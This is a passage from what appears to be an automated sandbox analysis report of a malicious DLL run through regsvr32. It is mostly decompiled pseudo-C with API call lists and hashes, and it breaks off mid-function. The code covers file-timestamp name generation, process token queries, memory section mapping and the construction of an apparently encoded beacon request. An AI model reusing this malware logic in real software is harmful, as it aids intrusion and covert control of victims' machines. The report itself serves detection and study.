                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 4624fbe9f518762ce70fea4d454b5f6a439f9f4a26a29396ecad4eb507e8a342
                                                  • Instruction ID: 1bae5084aa35b95ab119dca0543fa87d92fbf259d2dde5686084167d83387422
                                                  • Opcode Fuzzy Hash: 4624fbe9f518762ce70fea4d454b5f6a439f9f4a26a29396ecad4eb507e8a342
                                                  • Instruction Fuzzy Hash: C7E09B335012209B47119BE65C48C5FBBADEF89711704443BFA04E3120C7268C06C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: regsvr32.exe PID: 3528 Parent PID: 1132 regsvr32.exeCOMMON

                                                  Executed Functions

                                                  Function 00C812D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E00C812D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xc8d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xc8d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xc8d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xc8d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xc8d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xc8d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xc8d27c; // 0x41a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xc8e7f2; // 0x73797325
				_t83 = E00C895B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xc8d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xc8d27c; // 0x41a5a8
				_t16 = _t93 + 0xc8e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x00c812dd
                                                  0x00c812e3
                                                  0x00c812e5
                                                  0x00c812ff
                                                  0x00c81303
                                                  0x00c81306
                                                  0x00c8157b
                                                  0x00c81582
                                                  0x00c81582
                                                  0x00c8130c
                                                  0x00c81321
                                                  0x00c81323
                                                  0x00c81327
                                                  0x00c8132a
                                                  0x00c8156b
                                                  0x00c81575
                                                  0x00000000
                                                  0x00c81575
                                                  0x00c81330
                                                  0x00c8133b
                                                  0x00c81340
                                                  0x00c81345
                                                  0x00c81348
                                                  0x00c8134f
                                                  0x00c81356
                                                  0x00c81359
                                                  0x00c8155b
                                                  0x00c81565
                                                  0x00000000
                                                  0x00c81565
                                                  0x00c8136f
                                                  0x00c81373
                                                  0x00c81376
                                                  0x00c81379
                                                  0x00c81381
                                                  0x00c81384
                                                  0x00c8138d
                                                  0x00c81393
                                                  0x00c8139d
                                                  0x00c813a4
                                                  0x00c813a4
                                                  0x00c813b6
                                                  0x00c813c1
                                                  0x00c813cf
                                                  0x00c813d4
                                                  0x00c813d9
                                                  0x00c813dc
                                                  0x00c813e1
                                                  0x00c813eb
                                                  0x00c813ee
                                                  0x00c813f1
                                                  0x00c81407
                                                  0x00c8140b
                                                  0x00c8140e
                                                  0x00c81559
                                                  0x00000000
                                                  0x00c81559
                                                  0x00c81425
                                                  0x00c81476
                                                  0x00c81439
                                                  0x00c81441
                                                  0x00c81446
                                                  0x00c81454
                                                  0x00c8145d
                                                  0x00c81466
                                                  0x00c81466
                                                  0x00c81474
                                                  0x00c81474
                                                  0x00c8147a
                                                  0x00c8147e
                                                  0x00c8147e
                                                  0x00c81484
                                                  0x00000000
                                                  0x00000000
                                                  0x00c81486
                                                  0x00c8148c
                                                  0x00c81533
                                                  0x00c81536
                                                  0x00c81543
                                                  0x00c81543
                                                  0x00c81547
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8153c
                                                  0x00c81540
                                                  0x00c81540
                                                  0x00c81542
                                                  0x00c81542
                                                  0x00c8154c
                                                  0x00c81553
                                                  0x00c81555
                                                  0x00000000
                                                  0x00c81555
                                                  0x00c81492
                                                  0x00c81494
                                                  0x00c81494
                                                  0x00c814a7
                                                  0x00c814ad
                                                  0x00c814b8
                                                  0x00c814ba
                                                  0x00c814be
                                                  0x00c814c0
                                                  0x00c814c0
                                                  0x00c814c5
                                                  0x00c814c7
                                                  0x00c814c7
                                                  0x00c814c5
                                                  0x00c814cc
                                                  0x00c814d0
                                                  0x00c814d0
                                                  0x00c814e0
                                                  0x00c814e5
                                                  0x00c814e8
                                                  0x00c814e8
                                                  0x00c814eb
                                                  0x00c814f5
                                                  0x00c814fd
                                                  0x00c81502
                                                  0x00c81510
                                                  0x00c81510
                                                  0x00c81524
                                                  0x00c81528
                                                  0x00c81528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00C812FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00C81321
                                                  • memset.NTDLL ref: 00C8133B
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00C823E9,63699BCE,00C81354,73797325), ref: 00C895C2
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C895DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C81379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C8138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C813A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C813B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00C813F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 00C81407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C81425
                                                  • FindNextFileA.KERNELBASE(00C896C1,?), ref: 00C81439
                                                  • FindClose.KERNEL32(00C896C1), ref: 00C81446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00C81452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C81474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 00C814A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 00C814E0
                                                  • FindNextFileA.KERNELBASE(00C896C1,?), ref: 00C814F5
                                                  • FindClose.KERNEL32(00C896C1), ref: 00C81502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00C8150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C8151E
                                                  • FindClose.KERNELBASE(00C896C1), ref: 00C81553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00C81565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C81575
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 125b43cf4d755500b70c3ac6863881fff7960a56f92fadfbcbc25090703d9106
                                                  • Instruction ID: 2a989fde1dc93f4aca6af11d2dac2dcadf0f2cdc086cd9b3d6d540d3d4be65fd
                                                  • Opcode Fuzzy Hash: 125b43cf4d755500b70c3ac6863881fff7960a56f92fadfbcbc25090703d9106
                                                  • Instruction Fuzzy Hash: 6E8148B1900109EFDF11AFA5DC84BEEBBF9FB88344F14416AE516E6260D7309A45CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C883B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00C883B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00C82049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00C89039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x00c883c4
                                                  0x00c883c5
                                                  0x00c883c6
                                                  0x00c883c7
                                                  0x00c883c8
                                                  0x00c883cc
                                                  0x00c883d3
                                                  0x00c883e2
                                                  0x00c883e5
                                                  0x00c883e8
                                                  0x00c883ef
                                                  0x00c883f2
                                                  0x00c883f5
                                                  0x00c883f8
                                                  0x00c883fb
                                                  0x00c88406
                                                  0x00c88408
                                                  0x00c88411
                                                  0x00c88419
                                                  0x00c8841b
                                                  0x00c8842d
                                                  0x00c88437
                                                  0x00c8843b
                                                  0x00c8844a
                                                  0x00c8844e
                                                  0x00c88457
                                                  0x00c8845f
                                                  0x00c8845f
                                                  0x00c88461
                                                  0x00c88461
                                                  0x00c88469
                                                  0x00c8846f
                                                  0x00c88473
                                                  0x00c88473
                                                  0x00c8847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00C883FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00C88411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C8842D
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C8844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00C88457
                                                  • NtClose.NTDLL(?), ref: 00C88469
                                                  • NtClose.NTDLL(00000000), ref: 00C88473
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 72225f7e7ac267e58908060b0dbf89717c6efb2de4e36b0bc09aadbad793539e
                                                  • Instruction ID: 80bc1a7aa6187faaed65e868165c501fc58fbd0cbf22c7402e971a7676d61c3e
                                                  • Opcode Fuzzy Hash: 72225f7e7ac267e58908060b0dbf89717c6efb2de4e36b0bc09aadbad793539e
                                                  • Instruction Fuzzy Hash: 8C2112B2A0021DFBDB01AF95CC85ADEBFBDEF08744F104022F900E6121D7B19A44ABA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E005E1EB5(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E005E1D9F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                  0x005e1ebe
                                                  0x005e1ec5
                                                  0x005e1ec6
                                                  0x005e1ec7
                                                  0x005e1ec8
                                                  0x005e1ec9
                                                  0x005e1eda
                                                  0x005e1ede
                                                  0x005e1ef2
                                                  0x005e1ef5
                                                  0x005e1ef8
                                                  0x005e1eff
                                                  0x005e1f02
                                                  0x005e1f09
                                                  0x005e1f0c
                                                  0x005e1f0f
                                                  0x005e1f12
                                                  0x005e1f17
                                                  0x005e1f52
                                                  0x005e1f19
                                                  0x005e1f1c
                                                  0x005e1f22
                                                  0x005e1f27
                                                  0x005e1f2b
                                                  0x005e1f49
                                                  0x005e1f2d
                                                  0x005e1f34
                                                  0x005e1f42
                                                  0x005e1f42
                                                  0x005e1f2b
                                                  0x005e1f5a

                                                  APIs
                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005E1F12
                                                    • Part of subcall function 005E1D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005E1F27,00000002,00000000,?,?,00000000,?,?,005E1F27,00000002), ref: 005E1DCC
                                                  • memset.NTDLL ref: 005E1F34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Section$CreateViewmemset
                                                  • String ID: @
                                                  • API String ID: 2533685722-2766056989
                                                  • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction ID: 6c7f545db4368c6a85559686398c4cf0a4e8c0432a35785fac6cbb73ade71e19
                                                  • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction Fuzzy Hash: 15211DB1D00609AFDB11DFA9C8849EEFBB9FF48354F104469E656F3210D7309A488BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1D9F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E005E1D9F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                  0x005e1db1
                                                  0x005e1db7
                                                  0x005e1dc5
                                                  0x005e1dcc
                                                  0x005e1dd1
                                                  0x005e1dd7
                                                  0x00000000
                                                  0x005e1dd8
                                                  0x00000000

                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005E1F27,00000002,00000000,?,?,00000000,?,?,005E1F27,00000002), ref: 005E1DCC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction ID: fdcf1f80b0eeec7111902db50ea9e749526b08ff949265d29be9d8a2c52984f7
                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction Fuzzy Hash: 74F012F590064CBFDB119FA5CC85C9FBBBDEB44394B104E79B152E1090D6309E089A60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C88B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00C88B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xc8d018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0xc8d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0xc8d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xc8d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0xc8d27c; // 0x41a5a8
				_t3 = _t64 + 0xc8e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0xc8d02c,  *0xc8d004, _t59);
				_t67 = E00C81C1A();
				_t68 =  *0xc8d27c; // 0x41a5a8
				_t4 = _t68 + 0xc8e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E00C854BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0xc8d27c; // 0x41a5a8
					_t7 = _t127 + 0xc8e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0xc8d238, 0, _v8);
				}
				_t73 = E00C87649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0xc8d27c; // 0x41a5a8
					_t11 = _t122 + 0xc8e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0xc8d238, 0, _v8);
				}
				_t147 =  *0xc8d32c; // 0x10a95b0
				_t75 = E00C89395(0xc8d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0xc8d238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xc8d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xc8d238, _t153, _v20);
						goto L26;
					}
					E00C87A80(GetTickCount());
					_t82 =  *0xc8d32c; // 0x10a95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xc8d32c; // 0x10a95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xc8d32c; // 0x10a95b0
					_t149 = E00C88307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0xc8d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0xc8c2ac);
					_push(_t149);
					_t94 = E00C83CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xc8d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E00C8809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E00C8A1B0();
						L22:
						HeapFree( *0xc8d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E00C843DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E00C8163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E00C89039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E00C885DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00C89039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                  0x00c88b94
                                                  0x00c88b94
                                                  0x00c88b94
                                                  0x00c88b9f
                                                  0x00c88ba6
                                                  0x00c88ba8
                                                  0x00c88ba8
                                                  0x00c88bb5
                                                  0x00c88bc0
                                                  0x00c88bc3
                                                  0x00c88bc8
                                                  0x00c88bd1
                                                  0x00c88bd4
                                                  0x00c88bd9
                                                  0x00c88bdc
                                                  0x00c88be1
                                                  0x00c88be4
                                                  0x00c88bf0
                                                  0x00c88bfd
                                                  0x00c88bff
                                                  0x00c88c05
                                                  0x00c88c0a
                                                  0x00c88c15
                                                  0x00c88c17
                                                  0x00c88c1a
                                                  0x00c88c1c
                                                  0x00c88c23
                                                  0x00c88c29
                                                  0x00c88c2c
                                                  0x00c88c2f
                                                  0x00c88c34
                                                  0x00c88c41
                                                  0x00c88c43
                                                  0x00c88c49
                                                  0x00c88c53
                                                  0x00c88c53
                                                  0x00c88c55
                                                  0x00c88c5c
                                                  0x00c88c5f
                                                  0x00c88c62
                                                  0x00c88c67
                                                  0x00c88c74
                                                  0x00c88c76
                                                  0x00c88c84
                                                  0x00c88c84
                                                  0x00c88c86
                                                  0x00c88c94
                                                  0x00c88c99
                                                  0x00c88c9d
                                                  0x00c88ca0
                                                  0x00c88e63
                                                  0x00c88e6d
                                                  0x00c88e76
                                                  0x00c88ca6
                                                  0x00c88cb2
                                                  0x00c88cba
                                                  0x00c88cbd
                                                  0x00c88e57
                                                  0x00c88e61
                                                  0x00000000
                                                  0x00c88e61
                                                  0x00c88cc9
                                                  0x00c88cce
                                                  0x00c88cd7
                                                  0x00c88ce8
                                                  0x00c88cec
                                                  0x00c88cf5
                                                  0x00c88cfb
                                                  0x00c88d0a
                                                  0x00c88d11
                                                  0x00c88d1a
                                                  0x00c88d20
                                                  0x00c88e4b
                                                  0x00c88e55
                                                  0x00000000
                                                  0x00c88e55
                                                  0x00c88d2c
                                                  0x00c88d32
                                                  0x00c88d33
